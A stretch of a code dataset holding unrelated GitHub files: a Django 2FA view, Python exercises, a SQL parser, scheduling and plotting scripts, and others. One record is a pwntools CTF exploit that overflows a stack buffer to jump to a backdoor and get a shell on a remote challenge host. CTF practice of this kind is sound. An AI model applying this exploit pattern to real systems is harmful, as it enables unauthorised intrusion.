rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.generics import GenericAPIView\nfrom ..permissions import IsAuthenticated\n\nfrom ..models import Duo\nfrom ..app_settings import NewDuoSerializer, ActivateDuoSerializer, DeleteDuoSerializer\nfrom ..utils import encrypt_with_db_secret\nfrom ..authentication import TokenAuthentication\n\nclass UserDuo(GenericAPIView):\n\n authentication_classes = (TokenAuthentication, )\n permission_classes = (IsAuthenticated,)\n serializer_class = NewDuoSerializer\n allowed_methods = ('GET', 'PUT', 'DELETE', 'OPTIONS', 'HEAD')\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n Checks the REST Token and returns a list of all duo\n\n :param request:\n :type request:\n :param args:\n :type args:\n :param kwargs:\n :type kwargs:\n :return: 200\n :rtype:\n \"\"\"\n\n duos = []\n\n for duo in Duo.objects.filter(user=request.user).all():\n duos.append({\n 'id': duo.id,\n 'active': duo.active,\n 'title': duo.title,\n })\n\n return Response({\n \"duos\": duos\n },\n status=status.HTTP_200_OK)\n\n def put(self, request, *args, **kwargs):\n \"\"\"\n Checks the REST Token and sets a new duo for multifactor authentication\n\n :param request:\n :type request:\n :param args:\n :type args:\n :param kwargs:\n :type kwargs:\n :return: 201 / 400\n :rtype:\n \"\"\"\n\n serializer = NewDuoSerializer(data=request.data, context=self.get_serializer_context())\n\n if not serializer.is_valid():\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n title = serializer.validated_data.get('title')\n use_system_wide_duo = serializer.validated_data.get('use_system_wide_duo')\n duo_integration_key = serializer.validated_data.get('integration_key')\n duo_secret_key = serializer.validated_data.get('secret_key')\n duo_host = serializer.validated_data.get('host')\n enrollment_user_id = serializer.validated_data.get('enrollment_user_id')\n enrollment_activation_code = serializer.validated_data.get('enrollment_activation_code')\n validity_in_seconds = serializer.validated_data.get('validity_in_seconds')\n\n if use_system_wide_duo:\n new_duo = Duo.objects.create(\n user = request.user,\n title = 'System wide',\n duo_integration_key = '',\n duo_secret_key = encrypt_with_db_secret(''),\n duo_host = '',\n enrollment_user_id = enrollment_user_id,\n enrollment_activation_code = enrollment_activation_code,\n enrollment_expiration_date = timezone.now() + timedelta(seconds=validity_in_seconds),\n active=False\n )\n else:\n new_duo = Duo.objects.create(\n user = request.user,\n title = title,\n duo_integration_key = duo_integration_key,\n duo_secret_key = encrypt_with_db_secret(duo_secret_key),\n duo_host = duo_host,\n enrollment_user_id = enrollment_user_id,\n enrollment_activation_code = enrollment_activation_code,\n enrollment_expiration_date = timezone.now() + timedelta(seconds=validity_in_seconds),\n active=False\n )\n\n return Response({\n \"id\": new_duo.id,\n \"activation_code\": new_duo.enrollment_activation_code,\n },\n status=status.HTTP_201_CREATED)\n\n def post(self, request, *args, **kwargs):\n \"\"\"\n Validates a duo and activates it\n\n :param request:\n :type request:\n :param args:\n :type args:\n :param kwargs:\n :type kwargs:\n :return:\n :rtype:\n \"\"\"\n\n serializer = ActivateDuoSerializer(data=request.data, context=self.get_serializer_context())\n\n if not serializer.is_valid():\n\n return Response(\n serializer.errors, status=status.HTTP_400_BAD_REQUEST\n )\n\n duo = serializer.validated_data.get('duo')\n\n # delete it\n duo.active = True\n duo.save()\n\n request.user.duo_enabled = True\n request.user.save()\n\n return Response(status=status.HTTP_200_OK)\n\n def delete(self, request, *args, **kwargs):\n \"\"\"\n Deletes a duo\n\n :param request:\n :param args:\n :param kwargs:\n :return: 200 / 400\n \"\"\"\n\n serializer = DeleteDuoSerializer(data=request.data, context=self.get_serializer_context())\n\n if not serializer.is_valid():\n\n return Response(\n serializer.errors, status=status.HTTP_400_BAD_REQUEST\n )\n\n duo = serializer.validated_data.get('duo')\n duo_count = serializer.validated_data.get('duo_count')\n\n # Update the user attribute if we only had 1 duo\n if duo_count < 2 and duo.active:\n request.user.duo_enabled = False\n request.user.save()\n\n # delete it\n duo.delete()\n\n return Response(status=status.HTTP_200_OK)\n","repo_name":"psono/psono-server","sub_path":"psono/restapi/views/user_duo.py","file_name":"user_duo.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"78"} +{"seq_id":"41797630929","text":"informations={\n 'first_name':'zhangsan',\n 'last_name':'zhanghua',\n 'age':'23',\n 'city':'shanghai',\n }\nprint(informations)\nprint(\"\\n\")\n\n\nfriends={\n 'james':6,\n 'paul':3,\n 'harden':13,\n 'jordan':23,\n 'kobe':24,\n }\nprint(friends)\nprint(\"\\n\")\n\n\nvocabularys={\n 'upper':'字符串全部大写',\n 'lower':'字符串全部小写',\n 'title':'字符串首字母大写',\n 'strip':'字符串两端删除',\n 'lstrip':'字符串右端删除',\n }\nprint(vocabularys)\n\n","repo_name":"shenjinrong0901/python_work","sub_path":"学习阶段历程/homework6.2.py","file_name":"homework6.2.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29871394806","text":"# created by Илья Данилов\r\n# date 18.09.2021\r\n# description Вставка символа\r\n\r\ntry:\r\n wordStr, newWordStr = input().strip(), ''\r\n for x in wordStr:\r\n newWordStr += x + '*'\r\n print(newWordStr[:-1])\r\nexcept ValueError:\r\n print('Value error')\r\nexcept TypeError:\r\n print('Type error')\r\n","repo_name":"Qiwi636/Python_tasks","sub_path":"HW_2/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14551290735","text":"from pwn import *\n\ncontext(arch='amd64', os='linux', log_level='debug')\n# io = process('./bjdctf_2020_babystack')\nio = remote('node4.buuoj.cn', 29417)\ne = ELF('./bjdctf_2020_babystack')\nio.sendlineafter(b'Please input the length of your name:', b'100')\nbackdoor_address = e.symbols['backdoor'] # 0x4006E6\nlog.success('backdoor_address => %s' % hex(backdoor_address))\npayload = b'a'*0x10 + b'fuckpwn!' + p64(backdoor_address)\nio.sendlineafter(b'What\\'s u name?', payload)\nio.interactive()","repo_name":"Don2025/CTFwriteUp","sub_path":"BUUCTF/bjdctf_2020_babystack.py","file_name":"bjdctf_2020_babystack.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"78"} +{"seq_id":"37313922852","text":"\"\"\"\nWandb compatible plotting functions\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nfrom coffea import hist\nfrom io import BytesIO\nfrom PIL import Image\nimport wandb\n\n_NORM_LIST = [LogNorm(vmax=10000, vmin=0.1), LogNorm(vmax=10000 , vmin=0.1), LogNorm(vmax=10, vmin=0.1)]\n\ndef plot_calo_images(layer_images):\n image_list = []\n for idx in range(layer_images[0].shape[0]):\n image_list.append(plot_calo_image([layer_image[idx] for layer_image in layer_images]))\n return image_list\n \ndef plot_calo_image(image):\n fig, ax = plt.subplots(nrows=1, ncols=len(image), figsize=(12, 4))\n plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=0.45, hspace=None)\n \n for layer, axe in enumerate(fig.axes):\n im = axe.imshow(image[layer], aspect='auto', origin='upper', norm=_NORM_LIST[layer])\n axe.set_title('Layer ' + str(layer), fontsize=10)\n axe.tick_params(labelsize=10)\n \n axe.set_yticks(np.arange(0, image[layer].shape[0], 1))\n axe.set_xlabel(r'$\\phi$ Cell ID', fontsize=10)\n axe.set_ylabel(r'$\\eta$ Cell ID', fontsize=10)\n \n if layer == 0:\n axe.set_xticks(np.arange(0, image[layer].shape[1], 10))\n else:\n axe.set_xticks(np.arange(0, image[layer].shape[1], 1))\n \n cbar = fig.colorbar(im, ax=axe)\n cbar.set_label('Energy, (MeV)', fontsize=10)\n cbar.ax.tick_params(labelsize=10)\n \n buf = BytesIO()\n plt.savefig(buf, format='png', dpi=500)\n buf.seek(0)\n image = wandb.Image(Image.open(buf))\n buf.close()\n plt.close(fig)\n \n return image","repo_name":"ezeeEric/DiVAE","sub_path":"utils/plotting/plotCalo.py","file_name":"plotCalo.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"20367832008","text":"\"\"\"A simple checker for types of functions in treatment_functions.py.\"\"\"\n\nimport io\nimport sys\nfrom typing import Callable, Dict, List\nsys.path.insert(0, 'pyta')\nimport python_ta\nimport treatment_functions as tf\n\n\n##### Generic functions #####\n\ndef type_error_message(func_name: str, expected: str, got: str) -> str:\n \"\"\"Return an error message for function func_name returning type got,\n where the correct return type is expected.\n \"\"\"\n\n return ('{} should return a {}, but returned {}' +\n '.').format(func_name, expected, got)\n\n\ndef check_function(func: Callable, args: list, ret_type: type) -> None:\n \"\"\"Check that func called with arguments args returns a value of type\n ret_type. Display the progress and the result of the check.\n \"\"\"\n\n print('Checking {}...'.format(func.__name__))\n got = func(*args)\n assert isinstance(got, ret_type), \\\n type_error_message(func.__name__, ret_type.__name__, type(got))\n print(' check complete')\n\n\ndef check_type_details(assertion: bool, func_name: str, expected: str,\n got: str) -> None:\n \"\"\"Check that assertion is True. Display the progress and the result\n of the check. Failure means that function func_name was expected\n to return expected, but returned a value whose str represenation\n is got.\n\n Useful when return type is, for example, a nested list or a\n complex dict.\n\n \"\"\"\n\n print('Checking {}...'.format(func_name))\n assert assertion, type_error_message(func_name, expected, got)\n print(' check complete')\n\n\n###############\n\nprint('=====================================================================')\nprint('=====================================================================')\nprint('=====================================================================')\nprint('==================== Start: checking coding style ===================')\n\npython_ta.check_all('treatment_functions.py', config='pyta/a3_pyta.txt')\n\nprint('=================== End: checking coding style ====================\\n')\n\n\nprint('== Start: checking whether initial values of constants are modified ==')\n\n# Get the initial values of the constants\nCONSTS_BEFORE = [\n tf.NA, tf.TREATMENT, tf.PATIENT_ID_INDEX, tf.NAME_TO_VALUE,\n tf.ID_TO_ATTRIBUTES, tf.VALUE_TO_IDS, tf.ID_TO_SIMILARITY]\n\nprint('Check whether the constants are unchanged from the starter code.')\n\nassert CONSTS_BEFORE == ['NA', 'Treatment', 0, Dict[str, str],\n Dict[str, Dict[str, str]], Dict[str, List[str]],\n Dict[str, float]],\\\n ('You have modified the value of some constant(s). Edit your code so that'\n + ' the values of constants are the same as in the starter code.')\n\nprint(' check complete')\n\nprint('== End: checking whether initial values of constants are modified ==\\n')\n\n\nprint('============ Start: checking parameter and return types ============')\n\nd = {\n 'tcga.5l.aat0': {\n 'Age': '42', 'Gender': 'female', 'Tumor_Size': 't2',\n 'Nearby_Cancer_Lymphnodes': 'n0', 'Cancer_Spread': 'm0',\n 'Histological_Type': '1', 'Lymph_Nodes': '0', 'Treatment': 'A'},\n 'tcga.5l.aat1': {\n 'Age': 'NA', 'Gender': 'female', 'Tumor_Size': 't2',\n 'Nearby_Cancer_Lymphnodes': 'n0', 'Cancer_Spread': 'm1',\n 'Histological_Type': '1', 'Lymph_Nodes': '0', 'Treatment': 'B'}\n}\np = {'Age': '42', 'Gender': 'female', 'Tumor_Size': 't2',\n 'Nearby_Cancer_Lymphnodes': 'n0', 'Cancer_Spread': 'm0',\n 'Histological_Type': '1', 'Lymph_Nodes': '0', 'Treatment': 'A'}\n\n########### read_patients_dataset\ndata = ('Patient_ID\\tAge\\tGender\\tTumor_Size\\tNearby_Cancer_Lymphnodes\\t'\n 'Cancer_Spread\\tHistological_Type\\tLymph_Nodes\\tTreatment\\n'\n 'tcga.5l.aat0\\t42\\tfemale\\tt2\\tn0\\tm0\\t1\\t0\\tA\\n'\n 'tcga.5l.aat1\\tNA\\tfemale\\tt2\\tn0\\tm1\\t1\\t0\\tB')\n\ndata_io = io.StringIO(data)\nactual = tf.read_patients_dataset(data_io)\ncheck_type_details(\n isinstance(actual, dict) and 'tcga.5l.aat0' in actual and\n isinstance(actual['tcga.5l.aat0'], dict) and\n 'Gender' in actual['tcga.5l.aat0'] and\n isinstance(actual['tcga.5l.aat0']['Gender'], str),\n 'read_patients_dataset(a non-empty file)',\n 'a non-empty Dict[str, Dict[str, str]]',\n actual)\n\n########## build_value_to_ids\nactual = tf.build_value_to_ids(d, 'Gender')\ncheck_type_details(\n isinstance(actual, dict) and 'female' in actual and\n isinstance(actual['female'], list) and actual['female'] != [] and\n isinstance(actual['female'][0], str),\n 'build_value_to_ids',\n 'a non-empty Dict[str, List[str]] with a non-empty value',\n actual)\n\n######### patients_with_missing_values\nactual = tf.patients_with_missing_values(d, 'Age')\ncheck_type_details(\n isinstance(actual, list) and actual != [] and isinstance(actual[0], str),\n 'patients_with_missing_values',\n 'a non-empty List[str]',\n actual)\n\n######### similarity_score\ncheck_function(tf.similarity_score, [d['tcga.5l.aat0'], p], float)\n\n######### patient_similarities\nactual = tf.patient_similarities(d, p)\ncheck_type_details(\n isinstance(actual, dict) and 'tcga.5l.aat0' in actual and\n isinstance(actual['tcga.5l.aat0'], float),\n 'patient_similarities',\n 'a non-empty Dict[str, float]',\n actual)\n\n######### patients_y_similarity\nactual = tf.patients_by_similarity(d, p)\ncheck_type_details(\n isinstance(actual, list) and actual != [] and isinstance(actual[0], str),\n 'patients_by_similarity',\n 'a non-empty List[str]',\n actual)\n\n######## treatment_recommendations\nactual = tf.treatment_recommendations(d, p)\ncheck_type_details(\n isinstance(actual, list) and actual != [] and isinstance(actual[0], str),\n 'treatment_recommendations',\n 'a non-empty List[str]',\n actual)\n\n######## recommend_treatments\ncheck_function(tf.make_treatment_plans, [d, d], type(None))\n\n\nprint('============= End: checking parameter and return types =============\\n')\n\nprint('======= Start: checking whether functions modify constants =======')\n\n# Get the final values of the constants\nCONSTS_AFTER = [\n tf.NA, tf.TREATMENT, tf.PATIENT_ID_INDEX, tf.NAME_TO_VALUE,\n tf.ID_TO_ATTRIBUTES, tf.VALUE_TO_IDS, tf.ID_TO_SIMILARITY]\n\n# Check whether the constants are unchanged.\nprint('Checking whether functions modify constants...')\nassert CONSTS_BEFORE == CONSTS_AFTER, \\\n ('Your function(s) modified the value of some constant(s). Edit your' +\n '\\ncode so that the values of constants are unchanged by your functions.')\nprint(' check complete')\n\nprint('=========== End: checking whether functions modify constants ====')\n","repo_name":"Justinnnnnnz/Project","sub_path":"Medical Treatment Plan Auto Recommendation App Based on ML Algo/a3_simple_checker.py","file_name":"a3_simple_checker.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"31711341432","text":"# encoding: utf-8\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Author: Kyle Lahnakoski (kyle@lahnakoski.com)\n#\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport ast\n\nfrom pyparsing import \\\n CaselessLiteral, Word, delimitedList, Optional, Combine, Group, alphas, \\\n nums, alphanums, Forward, restOfLine, Keyword, Literal, ParserElement, infixNotation, opAssoc, Regex, MatchFirst\n\nParserElement.enablePackrat()\nDEBUG = False\n\nkeywords = [\"select\", \"from\", \"where\", \"group by\", \"order by\", \"with\", \"as\"]\n\nKNOWN_OPS = [\n {\"op\": \"*\", \"name\": \"mult\"},\n {\"op\": \"/\", \"name\": \"div\"},\n {\"op\": \"+\", \"name\": \"add\"},\n {\"op\": \"-\", \"name\": \"sub\"},\n {\"op\": \"=\", \"name\": \"eq\"},\n {\"op\": \"!=\", \"name\": \"neq\"},\n {\"op\": \"<>\", \"name\": \"neq\"},\n {\"op\": \">\", \"name\": \"gt\"},\n {\"op\": \"<\", \"name\": \"lt\"},\n {\"op\": \">=\", \"name\": \"gte\"},\n {\"op\": \"<=\", \"name\": \"lte\"},\n {\"op\": \"in\", \"name\": \"in\"},\n {\"op\": \"not\", \"name\": \"not\", \"arity\": 1},\n {\"op\": \"and\", \"name\": \"and\"},\n {\"op\": \"or\", \"name\": \"or\"}\n]\n\nlocs = locals()\nreserved = []\nfor k in keywords:\n name, value = k.upper().replace(\" \", \"\"), Keyword(k, caseless=True)\n locs[name] = value\n reserved.append(value)\nfor o in KNOWN_OPS:\n name = o['op'].upper()\n value = locs[name] = o['literal'] = CaselessLiteral(o['op'])\n reserved.append(value)\n\nRESERVED = MatchFirst(reserved)\n\n\ndef to_json_operator(instring, tokensStart, retTokens):\n # ARRANGE INTO {op: params} FORMAT\n tok = retTokens[0]\n op = filter(lambda o: o['op'] == tok[1], KNOWN_OPS)[0]['name']\n return {op: [tok[i * 2] for i in range(int((len(tok) + 1) /2))]}\n\n\ndef to_json_call(instring, tokensStart, retTokens):\n # ARRANGE INTO {op: params} FORMAT\n tok = retTokens\n op = tok.op\n params = tok.params[0]\n if not params:\n params = None\n elif len(params) == 1:\n params = params[0]\n return {op: params}\n\n\ndef unquote(instring, tokensStart, retTokens):\n val = retTokens[0]\n if val.startswith(\"'\") and val.endswith(\"'\"):\n val = \"'\"+val[1:-1].replace(\"''\", \"\\\\'\")+\"'\"\n val = val.replace(\".\", \"\\\\.\")\n elif val.startswith('\"') and val.endswith('\"'):\n val = '\"'+val[1:-1].replace('\"\"', '\\\\\"')+'\"'\n val = val.replace(\".\", \"\\\\.\")\n\n un = ast.literal_eval(val)\n return un\n\n# NUMBERS\nE = CaselessLiteral(\"E\")\n# binop = oneOf(\"= != < > >= <= eq ne lt le gt ge\", caseless=True)\narithSign = Word(\"+-\", exact=1)\nrealNum = Combine(\n Optional(arithSign) +\n (Word(nums) + \".\" + Optional(Word(nums)) | (\".\" + Word(nums))) +\n Optional(E + Optional(arithSign) + Word(nums))\n).addParseAction(unquote)\nintNum = Combine(\n Optional(arithSign) +\n Word(nums) +\n Optional(E + Optional(\"+\") + Word(nums))\n).addParseAction(unquote)\n\n# SQL STRINGS\nsqlString = Combine(Regex(r\"\\'(\\'\\'|\\\\.|[^'])*\\'\")).addParseAction(unquote)\nidentString = Combine(Regex(r'\\\"(\\\"\\\"|\\\\.|[^\"])*\\\"')).addParseAction(unquote)\n\n# EXPRESSIONS\nexpr = Forward()\n\nident = Combine(~RESERVED + (delimitedList(Word(alphas, alphanums + \"_$\") | identString, \".\", combine=True))).setName(\"identifier\")\nprimitive = realNum(\"literal\") | intNum(\"literal\") | sqlString | ident\nselectStmt = Forward()\ncompound = Group(\n realNum(\"literal\").setName(\"float\").setDebug(DEBUG) |\n intNum(\"literal\").setName(\"int\").setDebug(DEBUG) |\n sqlString(\"literal\").setName(\"string\").setDebug(DEBUG) |\n (Literal(\"(\").suppress() + Group(delimitedList(expr)) + Literal(\")\").suppress()).setDebug(DEBUG) |\n (Word(alphas)(\"op\").setName(\"function name\") + Literal(\"(\") + Group(delimitedList(expr))(\"params\") + \")\").addParseAction(to_json_call).setDebug(DEBUG) |\n ident\n)\nexpr << Group(infixNotation(\n compound,\n [(o['literal'], o.get('arity', 2), opAssoc.LEFT, to_json_operator) for o in KNOWN_OPS]\n).setName(\"expression\"))\n\n# SQL STATEMENT\ncolumn = Group(\n Group(expr).setName(\"expression\")(\"value\") + AS + ident.setName(\"column name\")(\"name\").setDebug(DEBUG) |\n Group(expr).setName(\"expression\")(\"value\") + ident.setName(\"column name\")(\"name\").setDebug(DEBUG) |\n Group(expr).setName(\"expression\")(\"value\").setDebug(DEBUG) |\n Literal('*')(\"value\").setDebug(DEBUG)\n).setName(\"column\")\ntableName = ident.setName(\"table name\")\n\n# define SQL tokens\nselectStmt << (\n SELECT.suppress() + delimitedList(column)(\"select\") +\n FROM.suppress() + delimitedList(tableName)(\"from\") +\n Optional(WHERE.suppress() + Group(expr).setName(\"expression\"))(\"where\") +\n Optional(GROUPBY.suppress() + Group(delimitedList(column)).setName(\"columns\"))(\"groupby\") +\n Optional(ORDERBY.suppress() + Group(delimitedList(column)).setName(\"columns\"))(\"orderby\")\n)\n\nSQLParser = selectStmt\n\n# IGNORE SOME COMMENTS\noracleSqlComment = Literal(\"--\") + restOfLine\nmySqlComment = Literal(\"#\") + restOfLine\nSQLParser.ignore(oracleSqlComment | mySqlComment)\n\n","repo_name":"pombredanne/moz-sql-parser","sub_path":"moz_sql_parser/sql_parser.py","file_name":"sql_parser.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"23518801100","text":"from odoo import models, fields, api\n\nclass ReportActivity(models.AbstractModel):\n _name = 'report.planner.activity_report'\n _description = 'Plan Activity'\n\n # (Start_date >= FSD and strart_date <= FLD) or (end_date >= FSD and end_date <= FLD)\n\n def _get_report_values(self, docids, data):\n self.model = self.env.context.get('active_model')\n docs = self.env[self.model].browse(self.env.context.get('active_ids'))\n if data['form']['all'] == True: \n activity_ids = self.env['plan.activity'].search(['|','&',('start_date','>=', data['form']['start_date']),('start_date','<=', data['form']['end_date']),'&',('end_date','>=', data['form']['start_date']),('end_date','<=', data['form']['end_date'])])\n plan_ids = self.env['project.plan'].search([])\n else:\n activity_ids = self.env['plan.activity'].search(['&','|','&',('start_date','>=', data['form']['start_date']),('start_date','<=', data['form']['end_date']),'&',('end_date','>=', data['form']['start_date']),('end_date','<=', data['form']['end_date']),('plan_id', 'in', data['form']['plan_ids'])])\n plan_ids = self.env['project.plan'].search([('id', 'in', data['form']['plan_ids'])])\n return {\n 'doc_ids': self.ids,\n 'doc_model': self.model,\n 'docs': docs,\n 'data': data['form'],\n 'activity_ids':activity_ids,\n 'plan_ids':plan_ids,\n }","repo_name":"charles-123456/Cristo","sub_path":"v13/addons/planner/report/report_activity.py","file_name":"report_activity.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21077031746","text":"import itertools\nfrom typing import List\n# import gurobipy as gp\nfrom gurobipy import *\nimport numpy as np\nimport simplejson\n\nIP_ABSOLUTE_GAP = 1000 # value in seconds of the absolute gap after achieving which IP solver will terminate\nIP_TIME_LIMIT = 600 # value in seconds of the time limit after which IP solver will terminate\n\ncapacities = [(20, 10), (50, 20), (60, 20), (100, 20), (200, 20), (500, 20), (1000, 1000)] # a list of tuples of the format: (capacity, max point capacity)\nspeed_km_h = 60 # Speed of the drones in km/h\nstop_time_min = 15 # Time drones spend in a cell\n\n\nstop_time_sec = stop_time_min*60\nspeed_m_s = speed_km_h*1000/(60*60)\n\n\ndef run_IP(number_of_drones: int, jobs_durations: List[float]):\n \"\"\"\n Solves Integer Program for Minimum Makespan Scheduling problem using Gurobi solver.\n It might be not necessary to solve this IP to optimality, therefore we leave IP_ABSOLUTE_GAP parameter which allows\n solver to stop when the best obtained solution is within IP_ABSOLUTE_GAP from optimality.\n\n Also, we make available an approximation LPT algorithm for this problem which finds solution within 4/3 - 1/3m from the optimum.\n :param number_of_drones: Between how many drones the tours will be divided. Should be a positive integer number.\n :param jobs_durations: A list of jobs durations.\n :return: A dictionary of assignments of drones to jobs (in the format \"drone_id: [jobs_ids]\") and a list of total jobs durations for every drone.\n \"\"\"\n print(number_of_drones)\n m = Model(\"Minimum makespan scheduling\")\n drones = range(number_of_drones)\n jobs = range(len(jobs_durations))\n jobs_to_drones_indices = list(itertools.product(drones, jobs))\n\n jobs_to_drones = m.addVars(jobs_to_drones_indices, name=\"drone_job\", vtype=GRB.BINARY)\n max_time_length = m.addVar(name=\"max_time_length\", vtype=GRB.CONTINUOUS)\n m.addConstrs((quicksum([jobs_to_drones[(drone, job)] for drone in drones]) == 1 for job in jobs)) #each job is assigned somewhere\n m.addConstrs((quicksum([jobs_to_drones[(drone, job)]*jobs_durations[job] for job in jobs]) <= max_time_length for drone in drones))\n\n m.setObjective(max_time_length, GRB.MINIMIZE)\n m.Params.MIPGapAbs = IP_ABSOLUTE_GAP\n m.Params.TimeLimit = IP_TIME_LIMIT\n m.optimize()\n\n jobs_assignment = {}\n\n for drone in drones:\n jobs_assignment[drone] = [job for job in jobs if jobs_to_drones[(drone, job)].X >= 0.8]\n\n bins = [sum([jobs_durations[job] for job in jobs if jobs_to_drones[(drone, job)].X >= 0.8]) for drone in drones]\n\n return jobs_assignment, bins\n\n\ndef lpt(number_of_drones: int, jobs: List[int]):\n \"\"\"\n Does the same as run_IP, but instead of solving IP, it runs Longest Processing Time algorithm which gives\n a solution within 4/3 - 1/(3m) from the optimum, where m is the number of drones.\n :param number_of_drones: Between how many drones the tours will be divided. Should be a positive integer number.\n :param jobs_durations: A list of jobs durations.\n :return: A dictionary of assignments of drones to jobs (in the format \"drone_id: [jobs_ids]\") and a list of total jobs durations for every drone.\n \"\"\"\n bins = np.zeros(number_of_drones)\n jobs_assignment = {}\n\n original_indices = np.argsort(jobs)[::-1]\n sorted_jobs = np.sort(jobs)[::-1]\n\n for i in range(len(original_indices)):\n job_length = sorted_jobs[i]\n job_original_index = original_indices[i]\n\n min_bin_index = np.argmin(bins)\n\n bins[min_bin_index] = bins[min_bin_index] + job_length\n\n if min_bin_index not in jobs_assignment:\n jobs_assignment[min_bin_index] = []\n\n jobs_assignment[min_bin_index].append(job_original_index)\n\n return jobs_assignment, bins.tolist()\n\n\ndef compute_jobs_durations(tours):\n \"\"\"\n Computes the durations of every tour using drone speed and time it takes at every stop.\n :param tours: A dictionary in the format from compute_tours.py\n :return: A list of jobs durations\n \"\"\"\n jobs = []\n\n for route in tours['routes']:\n number_of_stops = 0\n for stop_id in range(1, len(route['stops'])):\n previous_stop_id = stop_id - 1\n\n if not (route['stops'][previous_stop_id]['lat'] == route['stops'][stop_id]['lat']\n and route['stops'][previous_stop_id]['lon'] == route['stops'][stop_id]['lon']):\n number_of_stops = number_of_stops + 1\n\n jobs.append((route['distance'] / speed_m_s) + number_of_stops * stop_time_sec)\n\n return jobs\n\n\ndef main():\n for capacity in capacities:\n with open('./results/capacity_{}_{}.json'.format(capacity[0], capacity[1]), 'r') as f:\n routes = simplejson.load(f)\n\n jobs = compute_jobs_durations(routes)\n\n results = []\n\n for number_of_drones in range(1, 100):\n # jobs_assignment, bins = lpt(number_of_drones, jobs) # use this line instead of the next if LPT algorithm is preferred\n jobs_assignment, bins = run_IP(number_of_drones, jobs)\n results.append({\n 'number_of_drones': number_of_drones,\n 'jobs_assignment': [[int(x) for x in value] for (key, value) in jobs_assignment.items()],\n 'bins': bins,\n 'routes': [[routes['routes'][route] for route in jobs] for (drone_id, jobs) in jobs_assignment.items()]\n })\n\n with open('./results/schedule_ip_capacity_{}_{}'.format(capacity[0], capacity[1]), 'w') as res_f:\n simplejson.dump({'assignments': results, 'all_routes': routes}, res_f)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"undefiened/corona_drones","sub_path":"assign_tours.py","file_name":"assign_tours.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70416778171","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom sklearn.datasets import load_breast_cancer\n\n\ndef mds(data, d):\n \"\"\"\n input:data(ndarray):待降维数据\n d(int):降维后数据维数\n output:Z(ndarray):降维后的数据\n \"\"\"\n # ********* Begin *********#\n # 计算dist矩阵\n m = data.shape[0]\n dist2 = np.zeros((m, m))\n for i in range(m):\n for j in range(i + 1, m):\n dist2[i, j] = np.linalg.norm(data[i] - data[j]) ** 2\n dist2[j, i] = dist2[i, j]\n # 计算B\n B = np.zeros((m, m))\n dist2ij = np.mean(dist2)\n dist2i = np.mean(dist2, axis=1)\n dist2j = np.mean(dist2, axis=0)\n for i in range(m):\n for j in range(m):\n B[i, j] = -0.5 * (dist2[i, j] - dist2j[j] - dist2i[i] + dist2ij)\n\n # 矩阵分解得到特征值与特征向量\n value, vector = np.linalg.eigh(B)\n V = vector[:, : -d - 1: -1]\n A = value[: -d - 1: -1]\n # 计算Z\n Z = np.dot(V, np.sqrt(np.diag(A)))\n # ********* End *********#\n return Z\n\n\nif __name__ == '__main__':\n data = load_breast_cancer().data\n d = 2\n print(mds(data, d))\n","repo_name":"Green-Wood/hands-on-statistical-learning","sub_path":"4. dimensionality_reduction/MDS.py","file_name":"MDS.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"26445741814","text":"import boto3\nfrom botocore.exceptions import ClientError\nimport json\nfrom typing import List\nfrom math import radians, cos, sin, asin, sqrt\nfrom dataclasses import dataclass\nfrom enum import Enum\nimport sys\nimport datetime\n\ndynamodb = boto3.client(\"dynamodb\")\ntable = dynamodb.Table(\"users\")\n# 17 lines, 11 non-appl\ndef user_handler(event, context):\n username = event[\"username\"]\n password = event[\"password\"]\n if event[\"type\"] == \"CREATE_USER\":\n user_item = {username: username, password: password}\n dynamodb.put_item(TableName=\"users\", Item=json.dump(user_item))\n\n return {\"message\": \"created a user!\"}\n elif event[\"type\"] == \"LOGIN_USER\":\n try:\n response = table.get_item(Key={\"username\": username})\n except ClientError as e:\n return {\"message\": \"user not found\"}\n else:\n user = json.loads(response[\"Item\"])\n return {\"message\": user[\"password\"] == password}\n\n\n# 13 lines, 8 non-appl\nclient = boto3.client(\"lambda\")\n\n\ndef search_handler(event, context):\n lat = event[\"lat\"]\n lon = event[\"lon\"]\n\n payload = json.dumps({\"lat\": lat, \"lon\": lon})\n geo_response = client.invoke(\n FunctionName=\"geo\", InvocationType=\"Event\", Payload=payload\n )\n geo_payload = json.loads(geo_response.read())\n nearby_hotels: List[str] = geo_payload(\"hotel_ids\")\n\n payload = json.dumps({\"hotel_ids\": nearby_hotels})\n rate_response = client.invoke(\n FunctionName=\"rate\", InvocationType=\"Event\", Payload=payload\n )\n rate_payload = json.loads(rate_response.read())\n rate_plans: List[str] = 